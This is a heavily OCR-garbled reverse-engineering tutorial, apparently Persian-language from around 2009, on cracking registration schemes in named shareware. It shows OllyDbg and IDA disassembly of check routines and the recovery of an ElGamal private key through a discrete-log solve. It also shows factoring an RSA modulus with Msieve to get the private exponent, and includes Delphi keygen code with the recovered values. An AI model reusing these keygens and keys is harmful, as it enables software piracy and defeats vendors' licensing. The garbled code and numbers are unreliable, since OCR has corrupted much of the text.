¡Borland Delphi 6.0 - 7.0 


Cuuiscn) | 


[Stay on top 


ss ¿deis ds Jugó DEDE « sy Pepo LU Je so re ÓR A js ¿90 
15724 MKEYChange 


Event 


imabinimizeClick 
BTCloseClick 
MKEYKeyPress 
Or ale 
KEYChange 
merT Timer — 


ld 


ImagelMouseD own 
ImagelMouseMowve DDA55E2C 0016 


ly A 0) ES EA 


Base 10To FGInt € 
FGIntElGamalVerify € 


va KANAL 12.90 


CiDocuments and SettingsiPCiDesktopiRober 


FGint BaselOStringToFGInt:: ODOOS2BFC:: 004537H 
FGint Base256StringToFGInt:: 00052468 :: 004531 
FGint Base2StringToFGInt:: 0005293€ :: 0045353: 
FGint ElGamalWerify :: 00054984 :: 00455584 

FGint FGIntToBase2String :: 00052888 :: 00453484 
FGint MontgomeryModExp :: 0005430C :: 00454FOC 


Y 
Case) 


("Basel0StringToFGInt" function of FGint library 


Aa 


D0455E14 


DO455E80 0017 
DOA55E90 0013 
D0455E98 
00455438 


00455488 


1122334455667788 


Unregistered Version 


8 ay 0d zado llaga 


las leg as yz Ives oasz: ATARE ly yd $ ——_—_—_—_—__——- ) ES EA 


ca jur Pueblo dvaallzs MKEYChange rs ¿o* ssc000455A88 Í 


00455A88 PUSH  EBP 


00455AE9 DEC EAX 
00455AEA JGE SHORT 00455B45 


00455B5B CMP EAX, 10 
00455B5E JE SHORT 00455BB9 


00455BB9 LEA EAX, [LOCAL.”7] 


00455BBC MOV EDX, 455DC4 


00455BCC CALL 004537FC 


00455BD1 LEA EAX, [LOCAL.8] 


00455BD4 MOV EDX, 455DD8 


00455BE4 CALL 004537FC 


00455BE9 LEA EAX, [LOCAL.9] 


00455BEC MOV EDX, 455DEC 


00455BFC CALL  004537FC 


00455016 MOV ECX, 8 
00455C1B_ MOV EDX, 1 


00455C20 CALL  004043A8 


00455C3D CALL  0043242C 


00455045 MOV ECX, 10 
00455C4A MOV EDX, 9 


00455C4F CALL 004043A8 


00455068 CALL  0043242C 


A TIN 


Jóvaalles; 


¿Bye 40 all d ax 


1.- ó $. 
¿Aye 20 CÓC 16 


¿ ASCOSS "87897791 


E 


E Convert Base 10 to IIGSnk 
: h Daramelars z Y 
; ASOSS "972424840" 


¿ Contest Base 10 lo TESSA 


PP aramelela : y Ml 
: ASOSS "4150976728" 


¿Content Base 10 lo TITS 


" 
, 


393998 3d0Í o Eon 


Fi Cantclb es do Base 256 


is 


Cont Jos da Dare 296 


a 


lg los aaa Ives ago: ATARE ly yd E———— alvedosz 


00455C7C PUSH  — EAX 


Di RobenK ' 


00455C86 CALL 00455584 


00455C8B CMP BYTE PTR SS: [EBP 


00455C8F JNZ SHORT 00455CEF 


00455CA5 MOV EDX, 455E00 


00455CEF MOV EDX, 455DA4 


' 
Fl Pus h Lam 


: ElSamal Verify 


nm. - 


; ASCII " Registered To : " 


; ASCII "Unregistered Version" 


gd do y tr o y yen ide ji 
ábóaye suézóa aye FGIntElGamal 
ElGamalVerify «¿Já 2355. 4 O 


, 
A A 
Hip 


Procedure ElGamalVerify (Var 9, y, p : TFGInt; a, b, M: 


- ¿y (PY, G, 
. TFGInt 


uliidya 


A (ba): ost ¿aora Jo 
Ax hex), 299256 lso 
3ldés  alJés ElGamalsign (d¿- btámya do 


PEN ¿erasóóa ¿utóva 256 23 ¿2d TFGINE ) 


eo A ade IO, E 5 
20 y ás (ba) POLI cua 


das) ¿02412 ElGamalSign ¿ed de ita (a ) ¿óseo QUO. 


A INS 


lo a 0 go gú e 


String; Var ok : Boolean); 


OS 


1 s dá 1 á 
(dog ips: 


G = 878977914 
Y = 972424840 
P = 4150976723 


3378 sl 


dx 


¡CU 


las leg as yz Ives uasz: ATARE ly yd $ ———_—_—_—__——- ) ESTE 


Procedure ElGamalSign (M : String; Var p, 9, X, Kk : TEGInt; Var a, b : String); 


de e A O O 
K aa 008 lago Ol E: e din Jogo S 


¿00 Já ju Hex Jrs ali as Hex dor eg do aX 


G=3464237A_, Y = 39F60688 , P = F76AEOD3 


Y=GAX Mod P júdogiiriojiiiias ¿YY DLPSolve já ds? poo jalt ua: 


hipupeg!s DEP To001 
DLP: Y=G *XmodP 
Y: 39F60688 
G: [34642374 
P 
X 


: [F76AE0D3 
: ¡B1B33F7E 


Group Drder : 


cda Solve DLP figuged! = 
O Pollard - Rho Et 


Primefactor 01 : 2 | 
Primefactor 02: 7BB57069 
Factoring done! 


X =81833F7E(Hex)=2176008062 (Decimal): vepúg2r og adó > 


: A 
Loi 007 dl ds de jus apo: 


28 2/3 080 dado lbs 2009 


las leg as az Ives oasz: ATARE ly yd $ ) loiacloz 


Base [878977914 


Power 1972424840 


Mod 14150976723 P 


Find discrete logarithm | KÉ— Click Here 


Time elapsed: 0d 0h Orn Os mod mult: 95385 
Exp 2176008062 X 


Period [4150975722 


Written by Dario Alejandro Alpern. Last updated April 15th, 2005 


CEMPRAAPAN iso IA cerco lea JS 


Bits324 RH ¿0 bz 2 lUgd doi 30* jóuyilor bits 1024. 


MIES 


OLOS ds Ja? Delphi 


procedure TForml . GetSerialClick (Sender : TObject) ; 
Var 


FGInt_k, FGint g,FGint p,FGInt_x : TFGInt 


. 
JP 


str256_a,str256 b,strhex a,strhex b, g,pyX 


String ; 
begin 
If Length ( Tname.Text) < 1 then 
begin 
Tpass.text:= 'Name > 0'; (Edo dada!) 
EXlt ¿5 
end; 


28 Y ly 090 Ja lb pil 2009 


lag lus aaa Ives ago: ATARE ly yd E—_—_——— alvedOsz 


g:='878977914'5 
Basel0StringToFGInt (g,FGInt g); 
pi="4150976 7123" 
Basel0StringToFGInt (p,FGInt p); 
X:="2176008062' 7 ( FGInt Ó lóLy ael ] 
LO 
LO 


StringToFGInt (X ¡FGInt_x); 
StringToFGInt ('1',FGInt_k); 


Basel 


Basel 


ElGamalSign (tname . text , FGInt p,FGInt g,FGInt_x,FGInt k,str256 a,str256 b); 
ConvertBase256StringToHexString (str256 a,strhex a) 
ConvertBase256StringToHexString (str256 b,strhex b) 


Tpass.text:=strhex a + strhex b; 


end; 


rios higo ao fa agas ElGamal gab0ái ias dll dle ja y RS 


ai Uca lps 2009 a) 


lag los aaa Ives ago: ATARE ly yd E———— ldualuedosz 


RS AS ii RSACIYpt lulu 


Keysennins an PSA Target (1) 


uaRSALES edi zo no adog o corola ¿yaaa 900 Liso Public_key_cipher 


Galo dq as ao Bro MIT 33 Gógya yd 1 1978 
Ron Rivest, Adi Shamir 8. Les Andleman :¿Jús gasol pa y yl [lc ar Garda la 


ueqrlva rió, és ás pgs esque cosida brad, 


Y TS El 


(60 bs 2000/9/20 SOU: 004 ¿has mí 


Boyle * eps o Aga, ¿alclo db Ji ST ¿Chs 32 key Public skey Private 
¿he ansias y) cedro yálleg ión dez ) dy bs a a, 


dto alos vas q 3) els ti det 3d, 
keyPublic +N 33% degli ga a, Su 


Dj roll Private key- 2? ¿23 


de das ja daa jalea Nal js di a E o jileaj AS yo bas ¿bg 
aras ds 


y 


00% 2 li js er js ¿ 001 abla, e jo a a jy dba allago 0% ya das, 


ai ls Uca lps 2009 (42) 


le leas amd lveSgasz: ATARE ly yd AAA) liado 


3 


DA j A coa y a : 
ive 32 RSAencrypt  UgEZaio RSACrypt Apio Jo a 


aboga RSAdecrypt 
¿yl 
: RSAencrypt O 


EsTa dy Jas par daa: 


ás 30N 36 ablexó Ed sE 36 alj SÓ 


cae al, 


: RSAdecrypt (Y 


A E 
M=C” mod N 
UN sable posibili jor taslJE 0 


ajja alió Mi TO da ¡LN 


ás caja Ds e Jive Factoring $0 FO cóó raso N at 3% ¿50D 
másda do PAE Msieve 49 USE UA Tool .RSA 


A EC 


Amor SWF to Video Converter v2.9,9,5 


aby 9 U cada lll 2009 (43) 


le leas amd lveSgasz: ATARE ly yd AAA EST EA 


.ATARE FastScanner 99 PEiD O A 
OllyDbg O) 


.QuickUnpack O 


.Msieve o) 
.RSA Tool o 


O ME 2 18 de | cs : 
ha ¿A o 20 JU ay ye jya EN 


4 ide Sig sj y llas Jos yy ¡Sta 


dd Jururds elo Oigo q dll ¿ls dig ali a 
39200 Aus: 
ar 10001 22 Ó5. O 
ablcxó N o 


RSACrypte sal yy 
ds 


31363357 05 


o ablar): 


SO) 
ablexó D O 


DI Pl 1 12 E! Gu $ q abi xó uste HU y ALÍIN 
gara! 
a Ma el da yr “QuickUmpac — Juega 2 Jo Y asas justos ds 


k PEID ple 


E 3 


Krypto  ¿Ugió boy Poda di pod Jai PEID ys l izómayiaily ó 


je 
ps aaa ¿FGint 


ANALyzer ¿513 ¿usd ¿hó PEID: ¿sg oiga das YY : y 


all ly Uca lll 2009 


lis lees mz les vagz: ATARE UY s y lvl 


[+ FGint Basel10OStringToFGInt:: OOODSSEO :: 004D61E 
- FGint Base2StringToFGInt:: DOOD6574 :: 004D717< 
E FGint FGIntToBase2String :: D0O00D6490 :: 004D7O9C 
- FGint MontgomeryModExp :; 000D7394 ;; 004D7F94 


FGint RsaDecrypt:: 000D7A444 :: 004D3644 
ZLIB deflate [long] :: OOODAD4C ;: 004DB94C 


_ About | | Export, | _ Close | 
Adler32 checksum (unsigned 32-bit integer, BASE 
value); used by ZLIB compression library 


dá? Juor a 0 soda du jr do Export ¿oo Ley ¿iros 


Export... ===> To Clipboard ===> list of items with references 


CES all ¿Base10StringToFgint go rasa 2 2zo.FGint 


a El 
bad zos 


0) 3úLesz gas 


zo STO ADBLEO 2 sz 4D8644 ad seas OllyDbg Zo 2 va ¿Ea BaselOStringToFgint 


et e ao: 


1 CPU - main thread, module swftovid 


104D06108|] . MOU ESP,EBP 
40610A POP EBP 


MOU EAX, ERX 
PUSH Hr 


ECX, ECX 

DWORD PTR SS: [EBP-28],ECxX 
DWORD PTR SS: [EBP-24],ECxX 
E es e 
DWORD_PTR SS: [EBP-14],ECX 4 EA E 
EBX, EDX 

DWORD PTR SS: [EBP-4],ERX FGI 

EAX, DWORD PTR SS: LEBP-4] nt 


XOR EAX, ERX 

55 PUSH EBP 

68 2F644D000 |PUSH swftovid. 0B4D642F 

64: FF30 PUSH_DWORD_PTR_FS: CEAXI 
64:3920 OU DWORD : X],ESP 


TR E 


8B45 FC 
ES C9E9F2FF 
3300 


< 


E 


8D45 FC » DIJOR! 
E9 01000098 [E ECx, 1 


BA B100BB0a || MOV E 


E E ARA. 


28 213 00 dado lbs 2009 


y lacados e 


lie legs diz Ives ago: ATARE lay yc $ 


Ide apa 0 2ó yd gas datos 
abc Ma ay y pts al swftovideo.ini 


Was 


"Z CPU - main thread, module swflovid 


0O4D61E1 As - —_——- 
OB4D61ES 3 ADD ESP E ASCII EEES 
OD4De1ES ES Aa ea sul A DOÍED0E0 =w£ jar. DOFEDDEO 


OD4DE61E? Pus , 
OB4D61ES 5 => aa 
DO4DELEB NETA e 091 
50 = 

: n AO 33€ swftovid.1M04DEC18 
004D61EE DWORD PTR SS: CEBP-24],EC% E 
OBADE1F1 DWORD PTR SS1 CEBP-20], ECN DJAT920738 ntdl l. 70920738 
604D061F4 DIJORA Le EE ! swftovid, 0040610 


O04DE61F? OIFFFFFFFE) 
OB4DS1FA Co DIFFFFFFFE) 
BB4D61FC OIFFEFFFFE) 
ns 2 ALEFFFFFFF1 
00406207 ?FFDFOBO(FFF) 
0B4D6209 55 PUSH EBP 

ARANA2AD A2 2FR4406A_ 1PIUSH <uftovid. ARAN 


EBP=0012FFCO 
Local calls from 004D762E. B04D76B5. BO4D79B7. 


DOANSADDO 


BO4D79C4 


BO4D76R8. 


0D4DADAD 

eS FREERERES pe 
> y | 4o 00 ñ0 : 3 50 
204DA930 10: 80: - 31. e oorzrFEa| E 
pB4DAGIA| F4 : 23 4£ | e a D012FF68 


desonecol Él Ea bn Ealel AAN al Pe O012FFSC| SBADABAS 


( A TS Disassemblerin Follow « DT vr DODE ¿bcn du 
uds laa: 


aio 0 U cada do lll 2009 


le logs ado lus aso: ATARE 


2 CPU - main thread, module swftovid 


3880 F4030001 

ES E420F9FF 

8845 ES 

8D55 EC 

ES OSFBF2FF 

8B45 EC 

BA EOOO4EGB 

ES 10D1FFFF 

8D55 EG 

A1 48CB4D00 

SB06 

2889 FCo3an0l 

ES B720F9FF 

3B45 EO 

8D55 E4 

ES 6SFBF2FF 

8B45 Es 

A ESBa4E00 
ESDAFFFF 


FODOJ4EGO 
FODO4E00 
F3B04E00 
ESB04E00 


1AFSFFFF 
Al BACB4DBB 
2815 FS004E01 
ES SABEF2FF 


SP A 
esto AD9OES ¿y 


ES 9ISFBF2FF 


£B30_FCOSaDal Mi 
ES B720F9FF 
8845 Eb 


8D55 E4 
ES 6SFBF2FF 
8B45 E4 
BA ESO04EDO 
ES ESDOFFFF 


' 68 FODOJEDO 
a04D09102 63 FODB4EDO 


Stack SS: [6B12FFABI=6123221C, 
EAX=00009063 


mo. om 


qu 


Erotnld 


4: 


dió. ora dl lod aer l coa judo ve RSAdecryptind 


a ay ud dao lll 


gotas za FGintó 


MOU EAX,OWORD PTR DS: [EAX+3F4] 


MOU EAX, DWORD PTR SS: [EBP-18] 
LEA EDX, DWORD PTR SS: [EBP-14] 


MOU EAX, DWORD PTR SS: [EBP-14] 
MOU EDX, swftovid. BB4EBBED 


1514 RSS: [EBP-20] 
MOV EAX, DIVAAELPTR DS: [400B48] 
MOU EAX, DWORD “8 DS: [EAXJ 
MOV EAX, DIOR! Bo; CEAX+3FC] 


MOU EAX, DWORD PTR SS: [EB 
LEA EDxX, DWORD PTR SS: [EBP- 


MOU EAX, DWORD PTR_SS: [EBP-1C] 
MOU EDX, swftovid. B44EBBES 


swftovid. BB4E0OFO 
swftovid. 004E00FO 
swftovid. BB4EDBFO 
swftovid. 004E00FO 
swftovid. BB4EBBFS 
MOU ECX, swftovid. 004E0BES 
MOU EDX, swftovid. 004EB0E0 
MOU EAX, DWORD PTR DS: [4E00DCJ 


MOU EAX, DWORD PTR DS: [40CBB0] 
MOU EDX, DWORD PTR DS: [4E60F3] 


5 


O ; 
9 o 


8B45 EC MOU EAX, DWORD PTR_SS: [EBP-14] 
BA EG0O4EG0 (MOV EDX, swftovid. B04E0DED 


ES 10D1FFFF CELL. subtovid. B940€1EB 
8055 ES LEA EDx, DWORD PTR SS: CEBP-20] 


Al 48CB4068 | MOU 
2800 MOU EA%-MINRA PTR NS=TEO 


EAXx, DWORD PTR DS: [4DCB48] 


DWORD PTR_SS: LEBP-1C] 
swftovid. 0B4E0BES 


(ASCII 


sn 


alvedOz 


GO JE Ja 3 0 
vd áblcas N das A : 


y ¿able Auájya Gási, 


due .Base10StringToFgint 


ld les ad Ives oagz: ATARE 


dh a da 


a ay ul ao lll 


o... so 


. 
< 


cl cali 


8B45 FC 

ES SFCSF2FF 
8D45 FA 
8B15_ 4C5A4D61 
ES 39CAF2FF 
8D45 ES 
8B15 4C5A4D01 
ES 2BCAF2FF 
8D45 ES 
8B15 4C5A4D01 
ES 1DCAF2FF 
8045 DS 
£B15_4C5A4D61 
ES BFCAF2FF 
8D45 DG 
£B15 4C5A4D01 
ES BICAF2FF 
8D45 C3 
8B15_4C5A4D61 
ES FSC9F2FF 
8D45 Ca 


8B15 4C5A4D01 
ES ESC9F2FF 
8D45 


8B15_4C5A4D61 
ES D7C9F2FF 
3300 


ESDDIEGO 
EODD4EGO 
OCOB4EGO 
LRESFERR 


FOBO4E0n 
BODSFFFF 
E4CA4D60 


ES COB9F2FF 
75 2D 
Ai 5CD64000 


BOB 
ESE eaceanal MOV EDXx, DWORD 


laica 


DWORD_PTR SS: [EBP-8],ECx 
EDI,EDX 
DWORD PTR SS: [EBP-4],EAXx 


El 
M D TR [405440] 


LEA EAX, DWORD PTR SS: [EBP-18] 
MOU EDX, DWORD PTR DS: [40544C] 


he EAN DUORO PTR SS tEBp-20] 


mou DWORD PTR DS: [405440] 


LEA EAX, DWORD PTR SS: [EBP-28] 
MOU EDX, DWORD PTR DS: [405A4C] 


hb EA DUORO PTR 55: [EBP-30] 
mou od PTR_DS: [4D5A4C] 
LEA EAX, DWORD PTR SS: [EBP-38] 
MOU EDX, DWORD PTR DS: [4D05A4C] 


LEA EA DUERO PTR SS: [EBP-40] 


MOU El WORD PTR DS: [4D5A4C0] 


LEA EAX, DWORD PTR SS: [EBP-48] 
MOU EDX, DWORD PTR DS: [405440] 


XOR EAX, 
PUSH EBP 


MOU ECx, swftovid. BB4EDBES 
MOU EDX, swftovid. 0B4EDBEB 


mov y cubronia 004 DS: [4E06DC] 
. : [4D0CBB0] 
ln IX, DWORD PT 


DS: [4E00F3] 


00% ee tusco dla 
y Elo do 
RSAdecrypt 


ay EAX, DWORD PTI : 
U EAX, DWORD EE DS: STE 


R DS: [4DCBB 
MOU EDX, DWORD PTR Ds: CEDm) 


MOU EAX, DIOR! 
EAXx, DWORD 


4DD65C 1 


(El mou PTR DS: EAXx] 
EEES is tito E ol PTR DS: [EAX+334] 


£B03 
FFSi 64 
Al o o 


ño CX 5u0 RD_PTR 


A EAX, DWORD PTR 1 e 
U EAX, DWORD PTR D: 


SEA CEAX 
2880 38030001 NOU Es DWORD PTR Ds: CEAN+398] 
33D2 XOR EDx, EDX 


2B03 

FFS1 64 
ras 
BA_64944D00 


MOU ECX; DWORD_PTR DS: [EAX] 


: [EBP-28] 


mou EDX, swftovid. 10409464 


MOLL A 


luis legos amd luego: ATARE UY s J) IE 


: TO AS LA A A 
$ Qu maya alí ya y a ya ala ¿h ES E , Sul 3 ¡$ AU: 


Ai BO0CB4006 S: [40CBB0] 

8B15 F3004E01 MOU ED , [4E00F3] 

ES 3ABEF2FF 
EO0O4E0n 
14D03FFFF 
ESB04E00 
BADSFFFF 
FOBO4E00 
BODSFFFF 
E4CA4D6B [MOV EAX, DWORD PTR DS: Es 


£B00 [Hon + DWORD PTR DS: 

8615 B40CB4D61 MOU EDX, DWORD PTR DS: [4088 
gB12 MOU El ORD PTR DS: LEDX 
ES COB9F2FF 


Ai 5CDO4D00 |MOU EAX, DWORD PTR DS: [400650] 
28590 MOU EAX, DWORD PTR DS: CEAXJ 
288680 34030001 MOU EAX, DWORD PTR DS: [ERX+3: 
33D2 HOR e $ 


FFS1 64 

Ai SCDO4D06 [MOU EAx, DWORD PTR DS: [400651 
2600 MOU EAX, DWORD PTR DS: CEAXJ 
o ir EAX, DWORD PTR DS: [ERX+3: 


ORD_PTR DS: 


E 


£ 


2853 
FFS1 64 

E9 06020090 

8040 DS ORD PTR_ SS: [EBP-24 
BA_64944000 eel ED» suftovid. 00409464 


ES BAZAFEFF 

8B45 DS EBP-28] 
8D4D DC LEA ECX, DWORD PTR SS: [EBP-24] 
33D2 XOR EDX, EDX 

ES S1BOFEFF 

8B55 DC , : [EBP-24] 
Ai F4CA4000 ¿[4DCAF4 
ES BOBSF2FF 

8D4D DO LEA ECx, DWORD PTR SS: [EBP8 
BA_73944000 ci EDX, suftovid. 10409474 

ES 912AF6FF 
3845 DO 


£ 


DOOR 


ss 


Loco 


DOS 


DS: LOG É00607= BI2ZEG1C, TASCIT "Ss [sabesI”) 
EAX=004E00B9 (swftovid. B04E00BD) 


: Do e ya jalo sl: ¡LS ya aki y a si lá ya, 


ratkogl o ¿bis e 
Ju aj ado ¡Gén aya Je 


Je Jo gábes RSAencrypt 9 3100 gi veptGe do'E0uó RSAencryptsRSAdecrypt 


¿Us d e AD Lor? alle 36D $ ablexó La JU dal 3 


alla ill ás Tool RSA 


soya za actoring de 0 ssp 
ablcx3 Di Tool .RSA 


dedo : Lx 5 las Msieve * 3 z 


asias o lp y tag 


aby ly Uca lll 2009 


lud log ts io loss vag: ATARE lid _—___—. ) SN LS 


ero tado il FoZzomao 


kl, 


Sas) e ¿us ¿ic 4 


ve ¿lla 4 Msieyewo quo aJadile a) N q 


N= 111111918347621113761551267126198454426053267642844509165651820825173537473218924746426621953200773 


cdliiazos abycodriy tap 5q18,5.11:35:53 


:LogFile-3¿ cu dol aq y 1939 ¿ón idas p 


matrix includes 64 packed rows 

using block size 10922 for processor cache size 256 kB 

commencing Lanczos ¡teration ón 

memory use: 14.8 MB E Poo 
lanczos halted after 1410 iterations (dim = 89077) p q 
recovered 16 nontrivial dependencies git” 
prp29 factor: 78941566554947897894543544001 


prp70 factor: 1407521071554626289780418080217490708269946138415680077913757521688773 
elapsed time 


RSATOO lá Láa y :dómas áblcxip! yo 


q Daz Y ió Calc.Dio cta: olballa patio jscrátasp 


“4 RSA-Tool 2 by tE! 


Keysize (Bits) — 
(256. 


1st Prime (P) 
78941566554947897894543544001 


2nd Prime (Q) Ss 
11407521071554626289780418080217490708269946138415680077913757521688773 


Modulus (N) [R] D Bits 


111111191834762111376155126712619845442605326764284450916565182082517353747321892474 
16426621953200773 Li 
Ll 
N 
Private Exponent (D) 


(77602190008808972322409091030043038306637652196659132660357428446692823432003749971 
1649425541481473 
| 


| Help | | 


Ready. To create RSA Keys, press >Start< now to generate some random data... 


all ly 0 ao lll 2009 


lud log os aia les vag: ATARE A) dice. 


39dó irc ia 


detrógtar duo y 


Base Number eg 910% U jo Had de jui 


FP 


RSAencypt LU AN yD ax Sy celo jua dls iz Js Jl ¿o 


uses Fúlnt, FGIntR5A; 
($R *.dfm) 
resourcestrinyg 
el = '65537'; 


ni= '1111119183476211137615512671261984544260532676428445091656518208251735374 
di= '7?7602190008508972322409091030043038306637652196659132660367425844669282343 
procedure TForrmi.ButtoniClickiíSender: TObject): 


var 
test, b64:string; all al jay 
e,n:tfgint; RSAencrypt 

begin có ly 
test:=edit1.text; test”e mod n = test 


BaselO05tringToFGInt (d1, e): 
Basel0StringToFGInt (n1, n): 
RSiEncrypt (test, e, n, test); 
ConvertBase256to064¡test,b64):; 
edit2.Text:= ( b64): 
FGIntDestroy(e): 
FGIntDestroy(n): 

end: 


A 


0) SÓLO dor re N1z 


De AQUA Basel0StringToFGintiwc 


C=M*%DmodN ¿ote FGint seda RSAenorypt bso amo ¿ota 


M Oy test o dC ita deal get test 


+ 


esud1 soe ¿utajÓs y 22 FGint. O 
mi saeta FGint. O 


2% 


Con 


ax 


Catestiació Sua . o) 


aby ly Uca lll 2009 Ass H— 


lud log ts aio loves vagz: ATARE lid _—_____—. ) wood. 


sl jaa pto 


E 


aio 0 U cada do lll 2009 (152 H— 


lod leg 0 a los asc: ATARE lasdaloetoz 
FGIMERS Ad? da SAR Esodasó) luly 


Keysennins an PSA Target (2) 


ol ya a Jas Gua Absolute 


Absolute sound recorder (sz 23%) 


Ha aa e “a A A AO AE 
E 


A de PTS Ey 


: caló epi) Tracingl 3F8 9F7 


LOG % AójAs ¿nula liza yan, 


MáS ¿at illa ua sl. allá 6 Ús PEeditor : els do Cua 66 all ER % 1y£ 10] 
Cuesicibraj ma je ATARE FastScanner — ¿mó jósgó ¿oli PEID ly Lo 
33 


¿by rola loa $ 


A 
do boli 30 joyeria Header PE pot d do ago 


¿vias ¿ya Protector exe Private ¿U% oc air lacio ¿ua ssqabodo a 


ad ya 098 cdas lol 2009 153 


las leg as dz Ives oasz: ATARE Po aaa lodo z 


Kanal Us drorvePEID 


AnalyzerKrypto ¿4 gbtoL 3 altar rob 5-80 3,90 Wo 


: Absolutesound recorder: gu 1000 q paa? 50 a eius o aó 


E KANAL v2.82 oli 
File [CiYPragram Files Absolute Sound Recorderi4bs 


¿ad 


el ip dba ¿da ¿ya RSAEncrypt qbo JaLa si ca ad ys pas DOE E RSA 
cio o ql A a e FGIMtRSA E 32 00 e Aliaga FGint 


JJ 


¿Yaga oda a A, 


43 aa gaia 2 FGint $5 FGINIRSA q) ¿ya ¿a 


del 


ue rugogo by dr 
. Dede <i 35 OllyDbg ¿oros jaa» 4% 


alero ra (DA: Et Y ¿sr jo) 


Jiás pg joa y gi jalapa 7 oa jiniligaja: 


a UI IAS 


luis legos amd luego: ATARE WISH 5 led 


EIN La 


; Abtributes: bp-based frame 
IMPORTANT ROUTINE proc near 


var 8= dword ptr -% 
var_4= dword ptr -4 


pusk ebp 

mov ebp, esp 
push 0 

push Ú 

push ebx 

mov ebx, eax 
xor eax, eax 
push ebp 


pu=zk offset sub dA9PEÉE 
pusk dword ptr fs: [eax] 


mov fs: [esc], esp 
lea edx, [ebp+rar 4] 
mov eaxX, [ebx+314H] 
call sub_46E208 

lea edx, [ebp+war_¿] 
mov eax, [ebx+318h] 
call sub 46203 

mov eax, ds:off 4AEBBS 
mor esx, [esx] _ 
mov ecx, [ebp+tvar_8] 
mor edrc. febo+var 41 


call CHECK SUBROUTINE ; lgajao salet any gi joto 
test al, al E AS 
: short BAD BOY; bzáti gig pl 130 da 


pac Ti jaól 


est, ds: off 4AFEB3 
MOT eax, [eaxl 


Tom edx, [sbp+rrar_4] 

call sub_dAb6770 

push 401 

MOW ecx, offset s Congratulatio ; "Congratulations!” 

TMOW edx, offset s RegisterSucce ¡; "Register successfully! Thank you for y" 
MOT est, ds: off 4AEA74 

MOW eax, [eax] 

call sub _43F074 

MOW eax, ebx 


sub_43BT2C 


BAD_EOY; 
xor 
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las leg as dz Ives sz: ATARE 


DU sy 307 ¿oe CHECK_SUBROUTINE « 
EEOLLÓ qe eorrrdó alga 


E 


signatures Flirt aégyó coo 
Lo y; 


Abttributes: 


CHECK _ROUTINE proc near 


var 1C= dword ptr -1Ch 
var _14= deword ptr -14H 
var L= dword ptr -OCh 
var _3= dword ptr -% 
var_4= dword ptr -4 


ebp 

ebp, esp 

esp, DEFFFEFE4h 
ebx 


ebx, ebx 


[ebp+var_C], ebx 
[ebp+var_3], ecx 
[ebp+var_4], ed 
eax, [ebp+var 4] 
sub_4D4B5C 
eax, [ebp+var 3] 
sub_404B3C 

eex, [ebp+var 14] 
edx, off 49ECDZ 
sub 405105 

eax, [ebp+var 1C€] 
edx, off 49ECDZ 


sub 405105 
easx, ea 
ebp 


offset sub_4A64BA 
dword ptr fs: [ex] 
fs: [ex], esp 


edx, [ebp+var_1 4] 


esx, ds:off 4AE6F4 


sub_49F363 
edx, [ebp+var_1 2] 


eax, ds: off 4AE6F53 


sub _49F3685 

eax, [ebp+var 4] 
eax 

ecx, [ebp+var 1C€] 
edx, [ebp+var_1 4] 


a UI IAS 


bp-based frame 


Eg ón gos cada, 93d y 


0) EST EA 


> Analysis( Static ss año CO 0 PS) as dE) Ed «á abia cua»: 
E A E NN 


[ebp+var 1C] 
edx, [ebp+var 14] 
esx, [ebp+var 4] 
sub_421754 

edx, [ebp+var C] 
esx, [ebp+var 4] 
sub_49EF40 

esx, [ebp+var_3] 
edx, [ebp+var CE] 
sub_4043B3 

short loc 46430 


loc 4464535 : 


eax, easx 

edx 

ecx 

ecx 

fs: [eax], edx 
ofíset loc 426401 


loc_ 445499: 


lea 
TO 
TOR 
call 


esx, [ebp+war 1£] 
edx, off 49ECD5 
ecx, 2 

sub 405224 

ear, [ebp+vwar C] 
edx, 3 

sub _4046D0 
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lua logs add loss ago: ATARE UY s ) loci 


Reload the imput file 
(2 additional binary File... 
TDS file. ... 
POB file... 
DBG file... 
TDS file... 


[FLAT signature File... 


Parse C header file... 


Shift+F2 
Ctrl 
Save AS... 
Close 


Ctrl+F9 


List of available library modules l 0 (0) xf 


8 vclsmp60 Delphi 6 velsmp6D 

SD vc1x60 Delphi 6 velx50 

a wisualclx... Delphi 6 visualclx60 

2 visualdb... Delphi 6 visualdbclx60 

a webdsr.... Delphi 6 webdsnap50 Él 
a websna... Delphi 6 websnap£0 

A a«mirtl60 Delphi 6 «mirtl60 


BD67vcL Delphi 6/7 RTLACLCLX 
D?RTL Delphi 7 ATL 

8 Delphi? Delphi 7 RTL/YCL4CLX - [TON] 
8 adorti?0 Delphi 7 adortl0 
A 7 bdert!?0 Delphi 7 bdertl?0 
8 dbespre... Delphi 7 dbexpressA0 


8 dbrtizO Delphi 7 dbrtl?O 
A 7 dbxcds?O Delphi 7 dbxcds70 
A denanzn Nelnhi 7 dsnan ZN 


Line 88 of 253 


9. aaleioJ! wWsliaoV! 1>! 75>! 
Tol 6 gris! y, logleo ¿Sgisi paul 


Jal! JlosS! ¿baul 9 ¿Sol háol ps 


End ¿Wikyy, La UD oy alados h 
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lud log ts aio loss vagz: ATARE ly _—____—. ) wall. 


pusn ebp 
push offset sub_4A9F3F 
push dword ptr fs: [eax] 


mov fs: [eax], esp 

lea edx, [ebp+var_ 4] 

mov eax, [ebx+314h] 

call Controls: :TControl: :GetText(void) 
lea edx, [ebp+var_3] 

mov eax, [ebx+313h] 

call Controls: :TControl::GetTextl void) 
mov eax, ds:off 4AEBBS 

mov eax, [esx] 

mov ecx, [ebp+var_3] 

mov edx, [ebp+var_4] 


call CHECK _SUBROUTINE ; lgibiaas called ass ¿aa dar jj tia 
test al, al ¿o bjuJi 35 ¿ 
jz short BAD BOY A A AA A 


dl E 


eax, ds:off 4AERBBS 
esx, [eax] 


383 ¡ogg Sl 20 Vl duo 
aJisGetText su lgoul 


Was Lalo! ou: Poe 


diu! lriiw 15,>V! y 


: ets do 3 ; A la 
eta o ruedo él ou la go yr dió 
mov ebp, esp 
add esp, OFFFFFFE4h 
push ebx 
xor ebx, ebx 
mov [ebp+var_C], ebx 
mov [ebp+var_8] , e0x 
mov [ebp+var_4], edx 
mov eax, [ebp+var_4] 
call System::  linkproc_ _ LStrAddRef[void ?j 
mov eax, [ebp+var_3] 
call System::  linkproc__ LStrAddRef(void *) 
lea eax, [ebp+var_14] 
mov edx, off 49ECD3 
call _linkproc_ _lInitializeRecord(void *,void ?) 
lea eax, [ebp+var_1C] 
mov edx, off 49ECD3 
call _ limkproc InitializeRecord(wvoid *,void *) 
xor eax, eax 
push ebp 
push offset sub_4A64BA ERP, 
push dword ptr fs: [eax] Initialisation Jos) dlg> 
mov fs: [eax], esp 9 strings Jl aL SL 
xor ebx, ebx el des | 
lea edx, [ebp+var_14] 
mov sax, ds:off 4AE6F4 
